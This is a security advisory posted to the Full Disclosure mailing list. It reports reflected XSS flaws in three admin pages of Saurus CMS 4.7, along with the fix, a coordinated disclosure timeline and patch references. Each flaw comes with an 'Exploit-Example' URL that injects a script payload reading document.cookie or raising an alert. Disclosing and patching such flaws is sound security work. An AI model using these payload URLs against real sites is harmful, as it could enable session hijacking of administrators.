[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALH-=7wmMiyqhRwHKbNg9FBXjSirvMS1FWuD31ZncKcS7eVaEw@mail.gmail.com>
Date: Tue, 27 Jan 2015 21:52:50 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Reflecting XSS vulnerabilities in CMS Saurus v. 4.7 (CE)
Advisory: Reflecting XSS vulnerabilities in CMS Saurus v. 4.7 (CE)
Advisory ID: SROEADV-2015-05
Author: Steffen Rösemann
Affected Software: CMS Saurus v. 4.7 (CE, released: 12.08.2014)
Vendor URL: http://www.saurus.info
Vendor Status: patched
CVE-ID: -
==========================
Vulnerability Description:
==========================
The administrative backend of the Content Management System Saurus CMS v.
4.7 (Community edition, released: 12.08.2014) suffers multiple reflecting
XSS vulnerabilities.
==================
Technical Details:
==================
Reflecting XSS vulnerabilities reside in the following URLs of a common
Saurus CMS v. 4.7 installation:
user_management.php (parameter "search" is vulnerable to XSS):
http://
{TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=
Exploit-Example
http://
{TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=
profile_data.php (parameter "data_search" is vulnerable to XSS):
http://
{TARGET}/admin/profile_data.php?data_search=&profile_search=&profile_id=0
Exploit-Example
http://
{TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0
error_log.php (parameter "filter" is vulnerable to XSS):
http://
{TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=&algus=31.12.2014&lopp=07.01.2015&err_type=
Exploit-Example
http://
{TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type=
=========
Solution:
=========
Upgrade to the latest version of Saurus CMS v. 4.7 (release-date:
27.01.2015).
====================
Disclosure Timeline:
====================
07-Jan-2015 – found the vulnerabilities
07-Jan-2015 - informed the developers (see [2])
07-Jan-2015 – release date of this security advisory [without technical
details]
08-Jan-2015 - vendor responded, going to patch the issue
22-Jan-2015 - vendor needs more time as he wants to patch another
vulnerability simultaneously
27-Jan-2015 - vendor releases patch (see [4])
27-Jan-2015 - release date of this security advisory
27-Jan-2015 - send to FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://www.saurus.info
[2] https://github.com/sauruscms/Saurus-CMS-Community-Edition/issues/61
[3] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-05.html
[4]
https://github.com/sauruscms/Saurus-CMS-Community-Edition/commit/8dec044d0fdabcb9b04e58037623385a97b0d288
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists